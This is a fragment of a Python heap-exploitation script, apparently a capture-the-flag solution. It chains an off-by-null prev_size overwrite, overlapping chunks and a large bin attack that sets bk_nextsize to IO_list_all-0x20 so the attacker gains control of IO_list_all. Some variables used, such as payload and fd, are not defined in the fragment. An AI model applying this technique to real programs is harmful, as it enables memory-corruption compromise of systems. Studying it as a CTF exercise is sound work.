"""step 4""" # Barrier off by null rewrite H1 presize delete(4) # delete barrier add(0x408, b'a'*0x400 + p64(0x850)) # barrier off by null presize must equal to fake_chunk size
"""leak""" add(0x460, b'1') # over the second point add(0x420, b'2') # fill add(0x4a8, b'3') # final fill
add(0x500, b'extra to the end') # extra to the end # the new size is the extra - modify one 0x0000556ab0f695b0 - 0x0000556ab0f68480 = 0x1130 delete(4) # delete second point add(0x408, b'a'*0x28 + p64(0x1131)) # resize for the next overlap delete(8) # overlap
# now the target is to push the new overlap to the final fill add(0x428, b'1') # push 1 now is in the position add(0x4a8, b'3') # fill and make points add(0x430, b'4') # fill add(0x408, b'5') # fill the last overlap chunk
# start! delete(9) # delete add(0x500, b'111') # make it to large bin
# large bin attack add(0x480, b'1') delete(14) # delete the larger one add(0x500, pad) # put it into largebin delete(15) # delete the small one edit(11, 0x20, p64(fd)*2 + p64(fd_nextsize) + p64(IO_list_all-0x20)) # edit bk_nextsize = target - 0x20 add(0x500, payload) # 15
delete(2) add(0x480, b'1') # make IO_list_all to we can control